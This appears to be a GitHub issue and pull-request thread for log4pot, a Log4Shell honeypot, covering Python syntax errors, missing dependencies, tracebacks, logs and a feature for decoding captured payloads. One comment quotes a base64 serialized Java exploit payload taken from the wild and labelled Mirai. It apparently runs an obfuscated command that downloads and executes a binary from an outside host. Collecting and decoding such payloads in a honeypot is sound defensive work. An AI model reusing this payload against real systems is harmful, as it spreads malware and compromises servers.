Hello,

I am trying to run log4pot.py without any dependencies as mentioned in the Readme, as follows: python log4pot.py -p 8080

I am having a syntax error on line 96: if (m := ). This is an invalid syntax, also what is the m variable?

Please note, I tried to replace it with if (m==), I got an error that m is not defined.

Any help please on this? Thank you

Hello,

Is anyone getting this error:

Pycurl not available or there is an issue with curl dependencies: No module named 'pycurl'

I tried installing pycurl for both Python2 and Python3, using these commands.

pip install pycurl

pip3 install pycurl

Both of these were already satisfied.

FYI --

$ python3 log4pot.py @log4pot.conf
Azure dependencies not installed, logging to blob storage not available.
usage: log4pot.py [-h] [--port PORT] [--log LOG] [--blob-connection-string BLOB_CONNECTION_STRING] [--log-container LOG_CONTAINER] [--log-blob LOG_BLOB] [--server-header SERVER_HEADER]
log4pot.py: error: unrecognized arguments: storage connection string as provided in UI>

Just noticed the following exception:

----------------------------------------
Exception occurred during processing of request from ('x.x.x.x', 55160)
Traceback (most recent call last):
  File "/usr/lib/python3.9/socketserver.py", line 683, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.9/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.9/socketserver.py", line 747, in __init__
    self.handle()
  File "/usr/lib/python3.9/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.9/http/server.py", line 395, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.9/socket.py", line 704, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -
x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -

The according JSON log:

{"type": "request", "timestamp": "2021-12-16T13:44:23.029029", "correlation_id": "39f57c86-3b8a-46da-8ac1-568030215755", "server_port": 80, "client": "x.x.x.x", "port": 41482, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y:80"}}
{"type": "request", "timestamp": "2021-12-16T13:44:23.258082", "correlation_id": "c01af0fb-dcdc-41f3-af09-8680c6c99d81", "server_port": 80, "client": "x.x.x.x", "port": 37514, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y", "User-Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Accept": "*/*", "Accept-Encoding": "gzip"}}

Hello,

I removed the deprecated installer for poetry as mentionned in their documentation and added the pyp alternative. Also added the sudo for some cases as well as the azure package that was missing when I tried to launch the script.

Automatic decoding of serialized java classes, such as Mirai stuff below:

{
  ...
  "DN": "o=tomcat",
  "javaClassName": "java.lang.String",
  "javaSerializedData": "rO0ABXNyAB1vcmcuYXBhY2hlLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAHW9yZy5hcGFjaGUubmFtaW5nLkFic3RyYWN0UmVmAAAAAAAAAAECAAB4cgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3Rvcnl0ABJMamF2YS9sYW5nL1N0cmluZztMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgAETAAJY2xhc3NOYW1lcQB+AAR4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgAEeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgAEeHB0AAVzY29wZXQAAHNxAH4AC3QABGF1dGhxAH4AD3NxAH4AC3QACXNpbmdsZXRvbnQABHRydWVzcQB+AAt0AAtmb3JjZVN0cmluZ3QABng9ZXZhbHNxAH4AC3QAAXh0AZd7IiIuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlciIpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCJKYXZhU2NyaXB0IikuZXZhbCgiamF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoU3RyaW5nLmZyb21DaGFyQ29kZSg5OSwxMDAsMzIsNDcsMTE2LDEwOSwxMTIsNTksMzIsMTE5LDEwMywxMDEsMTE2LDMyLDQ5LDU3LDU2LDQ2LDU3LDU2LDQ2LDU0LDQ4LDQ2LDU0LDU1LDQ3LDk4LDEwNSwxMTAsMTE1LDQ3LDEyMCw1Niw1NCw1OSwzMiw5OSwxMDQsMTA5LDExMSwxMDAsMzIsNTUsNTUsNTUsMzIsNDIsNTksMzIsNDYsNDcsMTIwLDU2LDU0LDMyLDEwOCwxMTEsMTAzLDUyLDEwNiw1OSwzMiwxMTQsMTA5LDMyLDQ1LDExNCwxMDIsMzIsNDIpKSIpfXBwcHBweHQAJW9yZy5hcGFjaGUubmFtaW5nLmZhY3RvcnkuQmVhbkZhY3RvcnlwdAAUamF2YXguZWwuRUxQcm9jZXNzb3I=",
  ...
}

The data should be decoded and written to a file if enabled. Payload was unfortunately already yeeted and therefore not available for testing anymore.

:eyes: {"type": "exception", "timestamp": "2021-12-18T08:08:46.728625", "exception": "(28, 'Connection timed out after 3000 milliseconds')"}

This PR adds another key to log entries which include the deobfuscated payload. This works probably not reliably in every case, but was tested with lots of ITW jndi payloads.